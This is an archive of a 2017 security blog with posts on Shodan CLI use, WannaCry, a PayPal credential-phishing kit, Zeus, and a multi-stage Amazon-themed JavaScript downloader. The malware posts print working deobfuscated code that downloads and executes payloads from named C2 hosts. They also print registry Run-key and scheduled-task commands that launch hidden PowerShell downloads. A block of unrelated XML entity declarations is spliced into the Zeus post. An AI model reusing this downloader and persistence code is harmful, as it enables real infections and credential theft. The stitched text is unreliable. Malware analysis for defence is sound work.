Tuesday, May 30, 2017

Python: converting Shodan CSV into IOCs CSV

This is a small script that converts the CSV downloaded from Shodan into a new CSV that can be ingested into other platforms (e.g. ThreatConnect). You can grab the IOC column (e.g. IPs) and create a new CSV file with just that column; this new CSV can then be ingested into any other platform. You can pick and choose which column(s) you want to carry over into the new CSV; minor tweaks would be required. I'll keep updating this script and make it as interactive as possible, so watch the GitHub repo!
Get it here.



Tuesday, May 23, 2017

Sunday, May 14, 2017

Malware: WannaCry Ransomware - Infection Vector Unlikely to be Phishing

By now, the whole world has heard of the new ransomware WannaCry and its variants. Some of you might be wondering why nothing has been posted here on this site regarding the phishing aspect of the campaign. The reason is quite simple: unlike what many security vendors have reported, it is highly unlikely that the infection is being spread through phishing campaigns. The malware is targeting victims across the world through the well-known SMBv1 vulnerability whose exploit was released by the ShadowBrokers very recently. It looks like the internet is being scanned for vulnerable computers, which are then attacked with the malware.

Easy wins: disable SMB, and make sure you are not blocking the kill-switch domain.

There is a lot of reporting around this now, but most of it is just re-tweets and news stories that add little to nothing about the real campaign.

Here's a good RE paper from Jake Williams on the payload.
And here's the tool that you can use to prevent WannaCry infections if you can't patch your systems.



Wednesday, May 10, 2017

Tuesday, May 9, 2017

Phishing: PayPal theme 10 May 2017 | CredSteal

Originally published in PhishCentral

This one is currently active. It tries to lure victims into downloading and opening an HTML file that runs locally in the browser but POSTs information online, back to the C2, when the 'submit' button is hit, provided the information matches the conditions in the script.
This is what the email body looks like.

The HTML Attachment


Clever JS in the background makes the connection; it is obfuscated.
The actual HTML content only loads if internet access is available: the JS fetches the page contents and then displays them in the browser.

Locally saved HTML, loaded into a browser with internet available

The actual content is served from this server: www.infosec1.net

PCAP of the request in the background

The content served

The whole HTML is encrypted and is only decrypted on the fly in the browser. Once decrypted, we can see the JS code that executes in the browser.

Decrypted Code

The JS code is clever and checks for a few conditions. If the conditions are met, it POSTs the info to the C2 (http://www.bootstrapcdn3.net/e0445952.php); if the conditions are not met, it redirects to the legitimate PayPal site.

One of the conditions. 

Final condition that directs the traffic


IOCs for this:
www.infosec1.net
www.bootstrapcdn3.net
3061027594cf895b2e4a7ca0000f6bfe


:)

Using Shodan CLI | Downloading malware IOCs

I started using the Shodan CLI for personal research into malware C2 hosts and found the new Shodan tool Malware Hunter to be very helpful.
Thought I'd share with you guys how I use the API to grab the IOCs and then convert the JSON report into a CSV, which could then be used in many ways.

All of this is happening AFTER Shodan API keys have been successfully initialised (described in a post earlier).

First up, simply fire up the Shodan CLI to download the indicators by running the command below.

Syntax:
$ shodan download --limit [number of results you want, e.g. 1000] [filename, e.g. malware-iocs-date] category:malware

Example:
$ shodan download --limit 1000 malware category:malware

This should dump the results for you in a gzipped JSON file (malware.json.gz in the example above).
Next, if you want to, convert the results into a CSV:

$ shodan convert malware.json.gz csv

That's it. It'll dump a CSV version of the file for you to use whatever way you want to.
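The conversion described here, and the column-picking that the "converting Shodan CSV into IOCs CSV" post above does on the CSV, can be done in one pass straight from the JSON download. The following is an added example, not the script from the GitHub repo; it assumes the shodan download output is newline-delimited JSON (one banner per line) carrying the standard Shodan banner fields ip_str, port, hostnames and timestamp.

```python
import csv
import io
import json

# Columns carried into the IOC CSV: standard Shodan banner fields; edit to taste.
IOC_COLUMNS = ("ip_str", "port", "hostnames", "timestamp")

def banners_to_rows(lines, columns=IOC_COLUMNS, dedupe_on="ip_str"):
    """Flatten newline-delimited Shodan banners into rows of the chosen columns.
    List fields (hostnames) are joined with ';'; repeats of dedupe_on (the same
    IP seen on two ports) are dropped so the CSV holds one row per indicator."""
    rows, seen = [], set()
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            banner = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip a truncated or corrupt line instead of aborting the run
        key = banner.get(dedupe_on) if dedupe_on else None
        if dedupe_on and key in seen:
            continue
        seen.add(key)
        row = {}
        for col in columns:
            value = banner.get(col, "")
            row[col] = ";".join(map(str, value)) if isinstance(value, list) else value
        rows.append(row)
    return rows

def rows_to_csv(rows, columns=IOC_COLUMNS):
    """Render the rows as CSV text with a header row, ready for platform ingestion."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=list(columns), lineterminator="\n")
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()

# Constructed banners (not real Shodan output) so the script can be run offline.
SAMPLE_BANNERS = [
    '{"ip_str": "203.0.113.10", "port": 8080, "hostnames": ["c2.example.test"], "timestamp": "2017-05-23T10:00:00"}',
    '{"ip_str": "203.0.113.10", "port": 443, "hostnames": [], "timestamp": "2017-05-23T11:00:00"}',
    '{"ip_str": "198.51.100.7", "port": 4444, "hostnames": [], "timestamp": "2017-05-22T09:30:00"}',
    "{not json",
]

if __name__ == "__main__":
    print(rows_to_csv(banners_to_rows(SAMPLE_BANNERS)))
```

On a real download, pass `gzip.open("malware.json.gz", "rt", encoding="utf-8")` to banners_to_rows and write the string from rows_to_csv to a file.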

:)

Thursday, May 4, 2017

Installing the Shodan CLI

UPDATE:
I've released a Python tool that downloads, installs and initialises the Shodan CLI; you can get it on GitHub. More details in this post: http://rakshatec.blogspot.com.au/2017/05/free-tool-for-installing-shodan-cli.html

Here's a step-by-step guide for installing the Shodan CLI; very useful if you want to download data using commands instead of the browser. I looked around the internet for something like this but couldn't find anything, so thought I'd chuck this one on here.

You need Python installed to get started.
Once you have Python installed and ready to go, follow these steps. Depending on what you have and haven't got installed already, some steps might not be required.

First of all, install pip:

$ sudo apt install python-pip

Once pip is installed, go for Shodan!

$ pip install shodan

Good to go:
Now it's time to initialise your API key; you can get that key from your shodan.io account.
Use this command to initialise the key:

$ shodan init YOUR_API_KEY

You should be good to go from here on.
For more commands, have a look here - https://cli.shodan.io/

:)


Friday, April 28, 2017

News: Another Day, Another Obfuscation Technique




SANS ISC:
We got many samples from our readers and we thank them for this. It helps us to find how attackers are improving their techniques to bypass security controls and to fool the victims. Often the provided samples are coming from common "waves" of spam but, sometimes, they are interesting. I'm also collecting pieces of malware via my honeypot and yesterday I detected a Word document with a very low score on VT:

Read the full story here.

Sunday, April 23, 2017

Malware - Zeus | Apr 2017

Here are some of the characteristics of a current version of the Zeus banking malware.

Upon execution, the sample spawns explorer.exe, which then carries out the actual work.


PDB file names found in memory (not all of them are created by the malware):


C2 information:



HTTP connections:


System info sent back to the C2:


Misc information (can be used as IOCs):


Cookie:username@windowssearch.com/
Cookie:username@wireshark.org/

Connection: close
X-Powered-By: PHP/5.4.45-0+deb7u2
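As an added example (not the post's own code), a small Python matcher that runs the C2 indicators from this post over constructed proxy-log lines. A request to the C2 domain is scored high; a POST to /index.php carrying one of the two User-Agent strings the sample used is only a medium hunting lead, because both strings are legitimate Internet Explorer user agents. The log line layout is an assumption.

```python
import re
from urllib.parse import urlparse

# Indicators taken from the post. The two User-Agent strings are genuine IE
# strings, so on their own they are a hunting lead, never a verdict.
C2_DOMAINS = {"health.worldwidecons.ltd"}
C2_PATH = "/index.php"
ZEUS_UAS = {
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko",
}

# Assumed proxy-log layout: client_ip METHOD url "User-Agent"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)"$')

def classify(line):
    """Return a hit dict for one log line, or None when nothing matches."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    client, method, url, ua = m.groups()
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if host in C2_DOMAINS:
        return {"client": client, "level": "high", "reason": "traffic to known C2 host " + host}
    if method == "POST" and parsed.path == C2_PATH and ua in ZEUS_UAS:
        return {"client": client, "level": "medium",
                "reason": "POST /index.php with a User-Agent seen in the Zeus sample"}
    return None

def scan(lines):
    """Run classify over every line and keep the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (not real traffic): private clients, example.test decoy host.
SAMPLE_LOG = [
    '10.0.0.5 POST http://health.worldwidecons.ltd/index.php "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"',
    '10.0.0.6 POST http://cdn.example.test/index.php "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)"',
    '10.0.0.7 GET http://cdn.example.test/index.php "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"',
    '10.0.0.8 POST http://cdn.example.test/login "curl/7.50.1"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```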



<!ENTITY RightTeeArrow "&#x21A6;">
<!ENTITY mapsto "&#x21A6;">
<!ENTITY DownTeeArrow "&#x21A7;">
<!ENTITY mapstodown "&#x21A7;">
<!ENTITY larrhk "&#x21A9;">
<!ENTITY hookleftarrow "&#x21A9;">
<!ENTITY rarrhk "&#x21AA;">
<!ENTITY hookrightarrow "&#x21AA;">
<!ENTITY larrlp "&#x21AB;">
<!ENTITY looparrowleft "&#x21AB;">
<!ENTITY rarrlp "&#x21AC;">
<!ENTITY looparrowright "&#x21AC;">
<!ENTITY harrw "&#x21AD;">
<!ENTITY leftrightsquigarrow "&#x21AD;">
<!ENTITY nharr "&#x21AE;">
<!ENTITY nleftrightarrow "&#x21AE;">


Websites targeted:


The list is very long - they are not leaving any industry out!
Here's just one snippet:



Here's one of the de-obfuscated downloader scripts, by the way.

The code below is the part that grabs the payload from the c2 and executes it (the original was captured from a Windows Script Host dialog; it is laid out here one statement per line):

var wsh = new ActiveXObject("wscript.shell");
var sh = new ActiveXObject("shell.application");
var HTTP = new ActiveXObject("MSXML2.XMLHTTP");
var Stream = new ActiveXObject("ADODB.Stream");
// drop location: a random numeric file name under the user's Templates folder
var path = wsh.SpecialFolders("Templates") + "\\" + ((Math.random() * 999999) + 9999 | 0) + ".exe";
HTTP.Open("GET", "http://forum.glotran.club/rXKAdoWqgi.php", false);
HTTP.Send();
if (HTTP.Status == 200) {
    // write the raw response body to disk as a binary stream, then launch it
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(HTTP.ResponseBody);
    Stream.Position = 0;
    Stream.SaveToFile(path, 2);
    Stream.Close();
    sh.ShellExecute(path, "", "", "open", 1);
}



Thursday, April 20, 2017

Malware - JS Downloaders: Amazon Delivery Theme | APR 2017

This is one of the more interesting JS downloaders that I've come across recently. The fact that it downloads another script, which carries out the final download of the payload, is different from what we normally see. As to why exactly it is doing that, I'm not sure; it's just an extra layer.
The code in the second download is encrypted with a running XOR and is decrypted on execution. The following shots describe the flow of the campaign.

I've included the text versions of the interesting parts from the scripts, with comments, at the end of the post.

This is a screenshot of the first-stage JS code, which quite literally downloads another JS file and then executes it to get the payload.

First Stage JS
Below is the 'beautified' version of the same code.

First Stage Beautified


Below is the output of the selected code, which I modified a bit and printed out using console.log:

First Stage Debugging

Executing the modified code gives us the URLs for the second-stage JS script:
First Stage execution results

The downloaded JS is saved in the USER directory and executed from there:
Second Stage code

Now we go through the actual code that is executed to download the payload. Things get interesting around here. The actual code is encrypted using a running XOR, and decryption happens on execution. Once decrypted, the code is executed and the payload is downloaded and run. Again, I've used console.log to print out the decrypted version of the code and the other interesting bits that follow.

Second stage debugging

Below is a screenshot of the decrypted code after execution takes place. This is the code that checks a few things on the host system, runs a couple of loops and then eventually downloads the payload.

Second Stage Results

Below is the code extracted after decryption for the second-stage downloader:

Second Stage CODE

Below is the final JS code that will download the payload from the malNet:
Final JS Code


Here is the final JS code with interesting bits in comments:

Snippet #1

var ZGncoNX = new ActiveXObject('WScript.Shell');
var yiwUiaBBet = 600000;
//////CPwSorFGbw9A
//////5f2PK8sWYO22cgXwhsZX
var XvHMKvYV = "http://www.volf.de/term.php";
var xDUceoXahcbBJx0 = ZGncoNX.ExpandEnvironmentStrings('%PROCESSOR_REVISION%');

var xDUceoXahcbBJx1 = "u1";

var xDUceoXahcbBJx2 = ZGncoNX.ExpandEnvironmentStrings('%PROCESSOR_REVISION%%PROCESSOR_ARCHITECTURE%%COMPUTERNAME%%USERNAME%');
//////wK3LkavxMH
//////ffYP3PnSvRGt
WScript.Echo('x2 in this code is =' + xDUceoXahcbBJx2);
xDUceoXahcbBJx2 += xDUceoXahcbBJx;
var xDUceoXahcbBJx3 = "";
//////UP1WM4uKv
//////9SuE9DJo4Ar9knha6L
for (var xDUceoXahcbBJx4 = 0; xDUceoXahcbBJx4 < xDUceoXahcbBJx2.length; xDUceoXahcbBJx4++) {
xDUceoXahcbBJx3 += xDUceoXahcbBJx2.charCodeAt(xDUceoXahcbBJx4).toString(16);
};



/* ---------------------------
 xDUceoXahcbBJx3 - this is the ID that is sent back to the C2:
---------------------------
3436303178383657494e2d5036335533454d4835514356697368616c205468616b7572
---------------------------

 */

Snippet #2

ZGncoNX.Run('REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "' + xDUceoXahcbBJx0 + '0" /t REG_SZ /F /D "cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile(\'' + XvHMKvYV + '?cmd=d\',\'%userprofile%\\' + xDUceoXahcbBJx0 + '.js\'); %userprofile%\\' + xDUceoXahcbBJx0 + '.js"', 0, false);

/* ---------------------------
ZGncoNX.Run - OUTPUT:
---------------------------
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "46010" /t REG_SZ /F /D "cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile('http://www.volf.de/term.php?cmd=d','%userprofile%\4601.js'); %userprofile%\4601.js"
---------------------------
 */


Snippet #3

ZGncoNX.Run('REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "' + xDUceoXahcbBJx0 + '1" /t REG_SZ /F /D "%userprofile%\\' + xDUceoXahcbBJx0 + '.js"', 0, false);

/* 
---------------------------
ZGncoNX.Run
---------------------------
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "46011" /t REG_SZ /F /D "%userprofile%\4601.js"
---------------------------
 */

Snippet #4

ZGncoNX.Run('SCHTASKS /Create /TN ' + xDUceoXahcbBJx0 + ' /SC DAILY /F /TR %userprofile%\\' + xDUceoXahcbBJx0 + '.js', 0, false);

/* ---------------------------
ZGncoNX.Run
---------------------------
SCHTASKS /Create /TN 4601 /SC DAILY /F /TR %userprofile%\4601.js
---------------------------
 */

Snippet #5

This one is the XOR-encrypted code; it looks something like this:

xDUceoXahcbBJx5.WriteText('var UDyUWGgURHBZ = "\\x3e\\x17\\x41\\x64\\x1d\\x0f\\x7e\\x45\\x6d\\x20\\x22\\x58\\x2b\\x07\\x3f\\x46\\x64\\x45\\x68\\x13\\x12\\x0c\\.......


Snippet #6

xDUceoXahcbBJx6.open('GET', XvHMKvYV + '?cmd=p&id=' + xDUceoXahcbBJx3 + '&group=' + xDUceoXahcbBJx1 + '&os=' + xDUceoXahcbBJx + '&rnd=' + Math.random(), false);
/* ---------------------------
EndResult:
---------------------------
http://www.volf.de/term.php?cmd=p&id=3436303178383657494e2d5036335533454d4835514356697368616c205468616b7572&group=u1&os=&rnd=0.06770346768653279
---------------------------

 */
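As an added example (not part of the post, and not the sample's code), a Python helper that takes one check-in URL of the shape shown in Snippet #6, decodes the hex id back into the environment strings it was built from (Snippet #1), and lists the Run-key value names, scheduled-task name and dropped-script path that Snippets #2 to #4 derive from PROCESSOR_REVISION, so an IR analyst can search a host for them by name. The host name and user in the sample URL are constructed.

```python
from urllib.parse import urlparse, parse_qs

C2_PATH = "/term.php"                               # beacon endpoint from the post
KNOWN_ARCHS = ("AMD64", "x86", "ARM64", "IA64")     # PROCESSOR_ARCHITECTURE values

def encode_id(revision, arch, computer, user):
    """Rebuild the sample's id: the four env strings concatenated, each char hex-encoded.
    Mirrors JScript charCodeAt(i).toString(16), which does not zero-pad, so the layout
    is only reversible when every char is printable ASCII (two hex digits each)."""
    return "".join(format(ord(ch), "x") for ch in f"{revision}{arch}{computer}{user}")

def decode_id(hex_id):
    """Split a beacon id back into its parts. COMPUTERNAME and USERNAME have no
    separator in the sample, so they come back as one string."""
    if len(hex_id) % 2:
        raise ValueError("odd-length id: a char below 0x10 broke the two-digit layout")
    text = bytes.fromhex(hex_id).decode("ascii")
    revision, rest = text[:4], text[4:]              # PROCESSOR_REVISION is four hex digits
    arch = next((a for a in KNOWN_ARCHS if rest.startswith(a)), "")
    return {"revision": revision, "arch": arch, "host_and_user": rest[len(arch):]}

def triage_beacon(url):
    """Turn one check-in URL into the host artifacts the sample's persistence creates.
    Returns None for URLs that are not a 'cmd=p' check-in on the C2 path."""
    parsed = urlparse(url)
    q = parse_qs(parsed.query)
    if parsed.path != C2_PATH or q.get("cmd") != ["p"] or "id" not in q:
        return None
    ident = decode_id(q["id"][0])
    rev = ident["revision"]
    return {
        "c2_host": parsed.hostname,
        "group": q.get("group", [""])[0],
        **ident,
        "run_key_values": [rev + "0", rev + "1"],     # HKCU\...\Run /V names (Snippets #2, #3)
        "scheduled_task": rev,                         # SCHTASKS /TN name (Snippet #4)
        "dropped_script": "%userprofile%\\" + rev + ".js",
    }

# Constructed beacon: the URL layout is the post's, the host name and user are made up.
SAMPLE_URL = ("http://www.volf.de/term.php?cmd=p&id="
              + encode_id("4601", "x86", "WIN-LAB01", "analyst")
              + "&group=u1&os=&rnd=0.42")

if __name__ == "__main__":
    print(triage_beacon(SAMPLE_URL))
```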


That's all. 
:)

Tuesday, February 7, 2017